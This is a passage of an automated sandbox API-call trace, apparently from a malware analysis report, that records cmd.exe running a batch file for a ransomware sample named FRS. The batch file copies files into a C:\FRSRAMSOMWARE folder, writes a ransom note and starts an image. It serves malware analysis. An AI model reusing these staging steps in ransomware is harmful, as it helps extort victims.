(lpFileName="C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt", dwFileAttributes=0x20) returned 1 [0037.215] _close (_FileHandle=3) returned 0 [0037.215] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0037.215] GetFileType (hFile=0xffffffff) returned 0x0 [0037.215] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0037.215] SetFileTime (hFile=0xffffffff, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0xc8e310) returned 0 [0037.215] FindNextFileW (in: hFindFile=0xd27138, lpFindFileData=0xd1bc00 | out: lpFindFileData=0xd1bc00) returned 0 [0037.216] GetLastError () returned 0x12 [0037.216] FindClose (in: hFindFile=0xd27138 | out: hFindFile=0xd27138) returned 1 [0037.216] _vsnwprintf (in: _Buffer=0x12d0890, _BufferCount=0x103, _Format="%9d", _ArgList=0xc8ed44 | out: _Buffer=" 1") returned 9 [0037.216] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.216] GetFileType (hFile=0x28) returned 0x2 [0037.216] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0037.216] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xc8ecb8 | out: lpMode=0xc8ecb8) returned 1 [0037.216] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.216] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x28, lpConsoleScreenBufferInfo=0xc8ed08 | out: lpConsoleScreenBufferInfo=0xc8ed08) returned 1 [0037.216] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14 [0037.216] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0xc8ed38 | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b [0037.216] WriteConsoleW (in: hConsoleOutput=0x28, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0xc8ecec, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0xc8ecec*=0x1b) returned 1 [0037.217] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0xc8ed58, ProcessInformationLength=0x4) returned 0x0 [0037.217] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.217] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0037.217] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.217] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0037.217] _get_osfhandle (_FileHandle=0) returned 0x24 [0037.217] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0037.218] SetConsoleInputExeNameW () returned 0x1 [0037.218] GetConsoleOutputCP () returned 0x1b5 [0037.218] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0037.218] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.218] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0037.218] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0037.218] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.218] SetFilePointer (in: hFile=0x80, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0037.218] VirtualFree (lpAddress=0xcf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.218] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0037.218] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x206, lpOverlapped=0x0) returned 1 [0037.218] SetFilePointer (in: hFile=0x80, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0037.219] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0037.219] GetFileType (hFile=0x80) returned 0x1 [0037.219] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.219] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0037.219] GetEnvironmentVariableW (in: lpName="MYFILES", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F") returned 0x2f [0037.219] _tell (_FileHandle=3) returned 2237 [0037.220] _close (_FileHandle=3) returned 0 [0037.220] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0037.220] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0037.220] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0037.220] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0037.220] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0037.220] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0037.220] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.220] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.220] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.220] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.221] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.222] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\chinese_national_flag.png")) returned 0x20 [0037.222] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0xcf0000 [0037.222] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png", fInfoLevelId=0x1, lpFindFileData=0xd2f168, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd2f168) returned 0xd27158 [0037.222] GetFullPathNameW (in: lpFileName="C:\\FRSRAMSOMWARE\\Chinese_national_flag.png", nBufferLength=0x104, lpBuffer=0xc8e080, lpFilePart=0x0 | out: lpBuffer="C:\\FRSRAMSOMWARE\\Chinese_national_flag.png", lpFilePart=0x0) returned 0x2a [0037.222] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png", _String2="con") returned -53 [0037.222] CreateFileW (lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\chinese_national_flag.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e284, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x8c [0037.222] _open_osfhandle (_OSFileHandle=0x8c, _Flags=8) returned 3 [0037.222] _get_osfhandle (_FileHandle=3) returned 0x8c [0037.222] GetFileType (hFile=0x8c) returned 0x1 [0037.222] SetErrorMode (uMode=0x0) returned 0x0 [0037.222] SetErrorMode (uMode=0x1) returned 0x0 [0037.222] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png", nBufferLength=0x208, lpBuffer=0xc8e728, lpFilePart=0xc8e294 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png", lpFilePart=0xc8e294*="Chinese_national_flag.png") returned 0x49 [0037.222] SetErrorMode (uMode=0x0) returned 0x1 [0037.222] ReadFile (in: hFile=0x8c, lpBuffer=0xcf0000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e2b8, lpOverlapped=0x0 | out: lpBuffer=0xcf0000*, lpNumberOfBytesRead=0xc8e2b8*=0x200, lpOverlapped=0x0) returned 1 [0037.222] SetErrorMode (uMode=0x0) returned 0x0 [0037.222] SetErrorMode (uMode=0x1) returned 0x0 [0037.222] GetFullPathNameW (in: lpFileName="C:\\FRSRAMSOMWARE\\Chinese_national_flag.png", nBufferLength=0x208, lpBuffer=0xc8de80, lpFilePart=0xc8de64 | out: lpBuffer="C:\\FRSRAMSOMWARE\\Chinese_national_flag.png", lpFilePart=0xc8de64*="Chinese_national_flag.png") returned 0x2a [0037.222] SetErrorMode (uMode=0x0) returned 0x1 [0037.222] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png", _String2="C:\\FRSRAMSOMWARE\\Chinese_national_flag.png") returned 15 [0037.222] GetFileAttributesW (lpFileName="C:\\FRSRAMSOMWARE\\Chinese_national_flag.png" (normalized: "c:\\frsramsomware\\chinese_national_flag.png")) returned 0xffffffff [0037.223] GetLastError () returned 0x2 [0037.223] GetFullPathNameW (in: lpFileName="C:\\FRSRAMSOMWARE\\Chinese_national_flag.png", nBufferLength=0x104, lpBuffer=0xc8e080, lpFilePart=0x0 | out: lpBuffer="C:\\FRSRAMSOMWARE\\Chinese_national_flag.png", lpFilePart=0x0) returned 0x2a [0037.223] SetErrorMode (uMode=0x0) returned 0x0 [0037.223] SetErrorMode (uMode=0x1) returned 0x0 [0037.223] GetFullPathNameW (in: lpFileName="C:\\FRSRAMSOMWARE\\Chinese_national_flag.png", nBufferLength=0x208, lpBuffer=0xc8de80, lpFilePart=0xc8de64 | out: lpBuffer="C:\\FRSRAMSOMWARE\\Chinese_national_flag.png", lpFilePart=0xc8de64*="Chinese_national_flag.png") returned 0x2a [0037.223] SetErrorMode (uMode=0x0) returned 0x1 [0037.223] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png", _String2="C:\\FRSRAMSOMWARE\\Chinese_national_flag.png") returned 15 [0037.223] GetFileAttributesW (lpFileName="C:\\FRSRAMSOMWARE\\Chinese_national_flag.png" (normalized: "c:\\frsramsomware\\chinese_national_flag.png")) returned 0xffffffff [0037.223] CopyFileExW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\chinese_national_flag.png"), lpNewFileName="C:\\FRSRAMSOMWARE\\Chinese_national_flag.png" (normalized: "c:\\frsramsomware\\chinese_national_flag.png"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x12b5164, dwCopyFlags=0x0) returned 1 [0037.224] GetFileAttributesW (lpFileName="C:\\FRSRAMSOMWARE\\Chinese_national_flag.png" (normalized: "c:\\frsramsomware\\chinese_national_flag.png")) returned 0x20 [0037.225] SetFileAttributesW (lpFileName="C:\\FRSRAMSOMWARE\\Chinese_national_flag.png", dwFileAttributes=0x20) returned 1 [0037.225] _close (_FileHandle=3) returned 0 [0037.225] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0037.225] GetFileType (hFile=0xffffffff) returned 0x0 [0037.225] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0037.225] SetFileTime (hFile=0xffffffff, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0xc8e310) returned 0 [0037.225] FindNextFileW (in: hFindFile=0xd27158, lpFindFileData=0xd2f168 | out: lpFindFileData=0xd2f168) returned 0 [0037.225] GetLastError () returned 0x12 [0037.225] FindClose (in: hFindFile=0xd27158 | out: hFindFile=0xd27158) returned 1 [0037.225] _vsnwprintf (in: _Buffer=0x12d0890, _BufferCount=0x103, _Format="%9d", _ArgList=0xc8ed44 | out: _Buffer=" 1") returned 9 [0037.225] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.225] GetFileType (hFile=0x28) returned 0x2 [0037.225] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0037.225] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xc8ecb8 | out: lpMode=0xc8ecb8) returned 1 [0037.226] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.226] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x28, lpConsoleScreenBufferInfo=0xc8ed08 | out: lpConsoleScreenBufferInfo=0xc8ed08) returned 1 [0037.226] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14 [0037.226] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0xc8ed38 | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b [0037.226] WriteConsoleW (in: hConsoleOutput=0x28, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0xc8ecec, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0xc8ecec*=0x1b) returned 1 [0037.227] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0xc8ed58, ProcessInformationLength=0x4) returned 0x0 [0037.227] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.227] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0037.227] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.227] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0037.227] _get_osfhandle (_FileHandle=0) returned 0x24 [0037.227] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0037.227] SetConsoleInputExeNameW () returned 0x1 [0037.227] GetConsoleOutputCP () returned 0x1b5 [0037.227] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0037.227] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.228] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0037.228] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0037.228] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.228] SetFilePointer (in: hFile=0x80, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0037.228] VirtualFree (lpAddress=0xcf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.228] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0037.228] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x1b1, lpOverlapped=0x0) returned 1 [0037.228] SetFilePointer (in: hFile=0x80, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0037.228] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 43 [0037.228] GetFileType (hFile=0x80) returned 0x1 [0037.228] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.228] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0037.228] GetEnvironmentVariableW (in: lpName="MYFILES", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F") returned 0x2f [0037.229] _tell (_FileHandle=3) returned 2280 [0037.229] _close (_FileHandle=3) returned 0 [0037.229] _wcsicmp (_String1="start", _String2="DIR") returned 15 [0037.229] _wcsicmp (_String1="start", _String2="ERASE") returned 14 [0037.229] _wcsicmp (_String1="start", _String2="DEL") returned 15 [0037.229] _wcsicmp (_String1="start", _String2="TYPE") returned -1 [0037.229] _wcsicmp (_String1="start", _String2="COPY") returned 16 [0037.229] _wcsicmp (_String1="start", _String2="CD") returned 16 [0037.229] _wcsicmp (_String1="start", _String2="CHDIR") returned 16 [0037.229] _wcsicmp (_String1="start", _String2="RENAME") returned 1 [0037.229] _wcsicmp (_String1="start", _String2="REN") returned 1 [0037.229] _wcsicmp (_String1="start", _String2="ECHO") returned 14 [0037.229] _wcsicmp (_String1="start", _String2="SET") returned 15 [0037.229] _wcsicmp (_String1="start", _String2="PAUSE") returned 3 [0037.229] _wcsicmp (_String1="start", _String2="DATE") returned 15 [0037.229] _wcsicmp (_String1="start", _String2="TIME") returned -1 [0037.229] _wcsicmp (_String1="start", _String2="PROMPT") returned 3 [0037.229] _wcsicmp (_String1="start", _String2="MD") returned 6 [0037.229] _wcsicmp (_String1="start", _String2="MKDIR") returned 6 [0037.229] _wcsicmp (_String1="start", _String2="RD") returned 1 [0037.230] _wcsicmp (_String1="start", _String2="RMDIR") returned 1 [0037.230] _wcsicmp (_String1="start", _String2="PATH") returned 3 [0037.230] _wcsicmp (_String1="start", _String2="GOTO") returned 12 [0037.230] _wcsicmp (_String1="start", _String2="SHIFT") returned 12 [0037.230] _wcsicmp (_String1="start", _String2="CLS") returned 16 [0037.230] _wcsicmp (_String1="start", _String2="CALL") returned 16 [0037.230] _wcsicmp (_String1="start", _String2="VERIFY") returned -3 [0037.230] _wcsicmp (_String1="start", _String2="VER") returned -3 [0037.230] _wcsicmp (_String1="start", _String2="VOL") returned -3 [0037.230] _wcsicmp (_String1="start", _String2="EXIT") returned 14 [0037.230] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15 [0037.230] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14 [0037.230] _wcsicmp (_String1="start", _String2="TITLE") returned -1 [0037.230] _wcsicmp (_String1="start", _String2="START") returned 0 [0037.230] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0037.230] GetStdHandle (nStdHandle=0xfffffff6) returned 0x24 [0037.230] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0037.230] GetStdHandle (nStdHandle=0xfffffff4) returned 0x2c [0037.230] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0037.230] SetErrorMode (uMode=0x0) returned 0x0 [0037.230] SetErrorMode (uMode=0x1) returned 0x0 [0037.230] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\.", nBufferLength=0x208, lpBuffer=0xd174b0, lpFilePart=0xc725dc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F", lpFilePart=0xc725dc*="qb1143663.0F") returned 0x2f [0037.230] SetErrorMode (uMode=0x0) returned 0x1 [0037.230] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\.") returned 1 [0037.230] GetEnvironmentVariableW (in: lpName="PATHEXT", 